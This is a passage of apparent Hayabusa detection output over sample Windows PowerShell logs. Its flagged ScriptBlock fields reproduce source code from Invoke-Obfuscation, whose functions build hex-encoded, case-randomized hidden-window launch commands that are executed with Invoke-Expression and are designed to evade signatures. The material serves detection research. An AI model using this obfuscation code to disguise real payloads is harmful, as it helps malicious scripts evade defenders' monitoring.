@('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.254 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"riable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.254 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.258 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedHexCommand { <# .SYNOPSIS Generates hexadecimal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedHexCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedHexCommand encodes an input PowerShell scriptblock or path as a hexadecimal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInt -NoPr ""('57_72}69R74u65P2dR48T6fu73_74;20_27R48T65R6cR6c;6fT20;57}6fP72}6cT64u21;27}20}2dP46T6f}72u65{67T72}6f_75}6e{64P43_6f_6cR6f{72u20;47T72{65T65}6eT3b}20T57_72P69u74u65P2dT48T6fR73;74;20P27T4fu62;66P75{73R63}61}74{69R6fu6eT20T52u6fT63u6b;73u21;27}20;2d;46R6fT72T65P67P72R6fP75{6e}64T43_6fP6cR6f{72;20T47T72T65{65}6e'-SPLiT'P'-SpliT'}'-SPLIt 'u'-SpLIt'{'-SPLit'R' -SplIT '_'-SpliT'T' -SplIt';'| ForEach-Object { ([Convert]::ToInt16(( $_.ToString()),16)-AS[Char]) }) -Join ''|Invoke-Expression"" C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join (( 57,72 , 69 , 74 , 65, '2d', 48, '6f', 73 ,74, 20, 27 ,48, 65, '6c', '6c','6f', 20,57 , '6f',72,'6c' , 64 ,21 , 27 , 20 ,'2d', 46,'6f', 72 ,65 ,67, 72, '6f', 75 ,'6e', 64 ,43,'6f' , '6c' ,'6f' , 72,20 ,47 , 72 , 65, 65,'6e','3b', 20, 57 ,72,69 ,74 ,65,'2d',48 ,'6f' ,73, 74 ,20 , 27,'4f' ,62, 66,75 , 73 ,63 ,61 ,74 , 69 , '6f' , '6e', 20,52 , '6f',63 , '6b' , 73,21,27 , 20, '2d' ,46 ,'6f', 72,65 ,67, 72 ,'6f' ,75 ,'6e' , 64 , 43,'6f' ,'6c' , '6f' , 72 ,20, 47,72,65 , 65, '6e') |ForEach-Object{ ([Char]([Convert]::ToInt16( ([String]$_) ,16))) })|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 16 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters g-z with random case to $RandomDelimiters (avoiding a-f as it will be used for Hexadecimal values). @('g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Hex values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script w",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.258 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedHexCommand { <# .SYNOPSIS Generates hexadecimal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedHexCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedHexCommand encodes an input PowerShell scriptblock or path as a hexadecimal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInt -NoPr ""('57_72}69R74u65P2dR48T6fu73_74;20_27R48T65R6cR6c;6fT20;57}6fP72}6cT64u21;27}20}2dP46T6f}72u65{67T72}6f_75}6e{64P43_6f_6cR6f{72u20;47T72{65T65}6eT3b}20T57_72P69u74u65P2dT48T6fR73;74;20P27T4fu62;66P75{73R63}61}74{69R6fu6eT20T52u6fT63u6b;73u21;27}20;2d;46R6fT72T65P67P72R6fP75{6e}64T43_6fP6cR6f{72;20T47T72T65{65}6e'-SPLiT'P'-SpliT'}'-SPLIt 'u'-SpLIt'{'-SPLit'R' -SplIT '_'-SpliT'T' -SplIt';'| ForEach-Object { ([Convert]::ToInt16(( $_.ToString()),16)-AS[Char]) }) -Join ''|Invoke-Expression"" C:\PS> Out-EncodedHexCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join (( 57,72 , 69 , 74 , 65, '2d', 48, '6f', 73 ,74, 20, 27 ,48, 65, '6c', '6c','6f', 20,57 , '6f',72,'6c' , 64 ,21 , 27 , 20 ,'2d', 46,'6f', 72 ,65 ,67, 72, '6f', 75 ,'6e', 64 ,43,'6f' , '6c' ,'6f' , 72,20 ,47 , 72 , 65, 65,'6e','3b', 20, 57 ,72,69 ,74 ,65,'2d',48 ,'6f' ,73, 74 ,20 , 27,'4f' ,62, 66,75 , 73 ,63 ,61 ,74 , 69 , '6f' , '6e', 20,52 , '6f',63 , '6b' , 73,21,27 , 20, '2d' ,46 ,'6f', 72,65 ,67, 72 ,'6f' ,75 ,'6e' , 64 , 43,'6f' ,'6c' , '6f' , 72 ,20, 47,72,65 , 65, '6e') |ForEach-Object{ ([Char]([Convert]::ToInt16( ([String]$_) ,16))) })|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline 